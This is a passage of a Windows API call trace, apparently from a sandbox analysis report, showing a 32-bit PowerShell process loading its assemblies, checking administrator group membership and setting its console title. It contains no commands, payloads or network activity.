	[0109.663] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14e2a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0109.663] GetLastError () returned 0x0
	[0109.666] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14e2a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0109.666] GetLastError () returned 0x0
	[0109.923] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14e2a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0109.923] GetLastError () returned 0x0
	[0110.253] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x721bd8, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0110.254] GetLastError () returned 0xcb
	[0112.468] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", nBufferLength=0x105, lpBuffer=0x14e260, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", lpFilePart=0x0) returned 0x8e
	[0112.468] GetLastError () returned 0x2
	[0112.468] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", nBufferLength=0x105, lpBuffer=0x14e260, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", lpFilePart=0x0) returned 0x8e
	[0112.468] GetLastError () returned 0x2
	[0113.462] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x721bd8, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0113.462] GetLastError () returned 0xcb
	[0113.463] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x721bd8, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0113.463] GetLastError () returned 0xcb
	[0113.642] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x721bd8, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0113.642] GetLastError () returned 0xcb
	[0113.643] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x721bd8, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0113.643] GetLastError () returned 0xcb
	[0113.643] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x721bd8, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0113.643] GetLastError () returned 0xcb
	[0114.732] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", nBufferLength=0x105, lpBuffer=0x14e260, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", lpFilePart=0x0) returned 0x70
	[0114.732] GetLastError () returned 0x0
	[0114.732] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", nBufferLength=0x105, lpBuffer=0x14e260, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", lpFilePart=0x0) returned 0x70
	[0114.732] GetLastError () returned 0x0
	[0115.208] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x721bd8, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0115.208] GetLastError () returned 0xcb
	[0115.348] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x721bd8, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0115.349] GetLastError () returned 0xcb
	[0115.597] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14e260, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0115.597] GetLastError () returned 0x7e
	[0115.597] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14e260, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0115.597] GetLastError () returned 0x7e
	[0118.009] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", nBufferLength=0x105, lpBuffer=0x14e260, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", lpFilePart=0x0) returned 0x86
	[0118.009] GetLastError () returned 0x2
	[0118.009] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", nBufferLength=0x105, lpBuffer=0x14e260, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", lpFilePart=0x0) returned 0x86
	[0118.009] GetLastError () returned 0x2
	[0118.842] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x14e260, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0118.842] GetLastError () returned 0x57
	[0118.842] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x14e260, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0118.842] GetLastError () returned 0x57
	[0119.802] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", nBufferLength=0x105, lpBuffer=0x14e260, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", lpFilePart=0x0) returned 0x8c
	[0119.802] GetLastError () returned 0x2
	[0119.802] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", nBufferLength=0x105, lpBuffer=0x14e260, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", lpFilePart=0x0) returned 0x8c
	[0119.802] GetLastError () returned 0x2
	[0120.937] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0x14e260, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76
	[0120.937] GetLastError () returned 0x2
	[0120.937] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0x14e260, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76
	[0120.937] GetLastError () returned 0x2
	[0121.575] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x721bd8, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0121.575] GetLastError () returned 0xcb
	[0121.576] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x14e328, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0121.576] GetLastError () returned 0xcb
	[0121.577] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x14e2d8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0121.577] GetLastError () returned 0xcb
	[0121.577] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x14e2d8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0121.577] GetLastError () returned 0xcb
	[0122.373] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x14e2d8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0122.373] GetLastError () returned 0xcb
	[0123.137] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell.config", nBufferLength=0x105, lpBuffer=0x14e26c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell.config", lpFilePart=0x0) returned 0x3c
	[0123.137] GetLastError () returned 0x2
	[0123.137] SetErrorMode (uMode=0x1) returned 0x1
	[0123.137] GetFileAttributesExW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell.config" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\powershell.config"), fInfoLevelId=0x0, lpFileInformation=0x14e714 | out: lpFileInformation=0x14e714*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0
	[0123.137] GetLastError () returned 0x2
	[0123.137] SetErrorMode (uMode=0x1) returned 0x1
	[0125.012] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x14e328, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0125.012] GetLastError () returned 0x0
	[0125.012] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x14e2d8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0125.012] GetLastError () returned 0x0
	[0125.014] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x14e2d8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0125.014] GetLastError () returned 0x0
	[0125.017] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x721bd8, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0125.017] GetLastError () returned 0xcb
	[0125.270] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x721bd8, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0125.270] GetLastError () returned 0xcb
	[0125.270] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x721bd8, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0125.270] GetLastError () returned 0xcb
	[0125.696] CoCreateGuid (in: pguid=0x14e7f4 | out: pguid=0x14e7f4*(Data1=0xb1bc6cf1, Data2=0x508e, Data3=0x4844, Data4=([0]=0x81, [1]=0x3, [2]=0x40, [3]=0xe4, [4]=0xcf, [5]=0xfc, [6]=0x51, [7]=0x70))) returned 0x0
	[0125.837] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x721bd8, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0125.837] GetLastError () returned 0xcb
	[0125.839] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x721bd8, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0125.839] GetLastError () returned 0xcb
	[0125.841] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x721bd8, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0125.841] GetLastError () returned 0xcb
	[0126.322] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xf
	[0126.708] GetLastError () returned 0x0
	[0126.710] GetConsoleScreenBufferInfo (in: hConsoleOutput=0xf, lpConsoleScreenBufferInfo=0x14e6d4 | out: lpConsoleScreenBufferInfo=0x14e6d4) returned 1
	[0126.710] GetLastError () returned 0x0
	[0126.715] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x13
	[0126.716] GetLastError () returned 0x0
	[0126.716] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x13, lpConsoleScreenBufferInfo=0x14e6d4 | out: lpConsoleScreenBufferInfo=0x14e6d4) returned 1
	[0126.716] GetLastError () returned 0x0
	[0126.717] GetVersionExW (in: lpVersionInformation=0x721bf0*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x721bf0*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
	[0126.717] GetLastError () returned 0x0
	[0126.718] GetCurrentProcess () returned 0xffffffff
	[0126.718] GetLastError () returned 0x3f0
	[0126.720] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x14e6e4 | out: TokenHandle=0x14e6e4*=0x344) returned 1
	[0126.720] GetLastError () returned 0x3f0
	[0127.113] GetTokenInformation (in: TokenHandle=0x344, TokenInformationClass=0x8, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x14e73c | out: TokenInformation=0x0, ReturnLength=0x14e73c) returned 0
	[0127.113] GetLastError () returned 0x7a
	[0127.115] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x7345c8
	[0127.115] GetLastError () returned 0x7a
	[0127.115] GetTokenInformation (in: TokenHandle=0x344, TokenInformationClass=0x8, TokenInformation=0x7345c8, TokenInformationLength=0x4, ReturnLength=0x14e73c | out: TokenInformation=0x7345c8, ReturnLength=0x14e73c) returned 1
	[0127.115] GetLastError () returned 0x7a
	[0127.118] DuplicateTokenEx (in: hExistingToken=0x344, dwDesiredAccess=0x8, lpTokenAttributes=0x0, ImpersonationLevel=0x2, TokenType=0x2, phNewToken=0x14e6f4 | out: phNewToken=0x14e6f4*=0x33c) returned 1
	[0127.118] GetLastError () returned 0x7f
	[0127.118] GetTokenInformation (in: TokenHandle=0x344, TokenInformationClass=0x8, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x14e73c | out: TokenInformation=0x0, ReturnLength=0x14e73c) returned 0
	[0127.119] GetLastError () returned 0x7a
	[0127.119] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x7345a8
	[0127.119] GetLastError () returned 0x7a
	[0127.119] GetTokenInformation (in: TokenHandle=0x344, TokenInformationClass=0x8, TokenInformation=0x7345a8, TokenInformationLength=0x4, ReturnLength=0x14e73c | out: TokenInformation=0x7345a8, ReturnLength=0x14e73c) returned 1
	[0127.119] GetLastError () returned 0x7a
	[0127.120] CheckTokenMembership (in: TokenHandle=0x33c, SidToCheck=0x2a9aedc*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x20, [1]=0x0)), IsMember=0x14e6d0 | out: IsMember=0x14e6d0) returned 1
	[0127.120] GetLastError () returned 0x7a
	[0127.120] CloseHandle (hObject=0x33c) returned 1
	[0127.120] GetLastError () returned 0x7a
	[0127.120] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x14e1e4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0127.120] GetLastError () returned 0x7a
	[0127.120] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x14e194, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0127.120] GetLastError () returned 0x7a
	[0127.120] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x14e194, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0127.120] GetLastError () returned 0x7a
	[0127.120] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x14e194, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0127.120] GetLastError () returned 0x7a
	[0127.155] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x14e1e4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0127.155] GetLastError () returned 0x7a
	[0127.155] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x14e194, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0127.155] GetLastError () returned 0x7a
	[0127.155] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x14e194, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0127.155] GetLastError () returned 0x7a
	[0128.378] GetConsoleTitleW (in: lpConsoleTitle=0x722398, nSize=0x400 | out: lpConsoleTitle="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell.exe") returned 0x39
	[0128.378] GetLastError () returned 0x7a
	[0129.144] GetConsoleTitleW (in: lpConsoleTitle=0x722398, nSize=0x400 | out: lpConsoleTitle="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell.exe") returned 0x39
	[0129.144] GetLastError () returned 0x7a
	[0129.144] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x14e1dc, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0129.144] GetLastError () returned 0x7a
	[0129.144] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x14e18c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0129.145] GetLastError () returned 0x7a
	[0129.145] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x14e18c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0129.145] GetLastError () returned 0x7a
	[0129.151] SetConsoleTitleW (lpConsoleTitle="Administrator: C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell.exe") returned 1
	[0129.152] GetLastError () returned 0x7a
	[0129.153] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x14e214, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0129.153] GetLastError () returned 0x7a
	[0129.153] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x14e1c4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0129.153] GetLastError () returned 0x7a
	[0129.153] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x14e1c4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0129.153] GetLastError () returned 0x7a
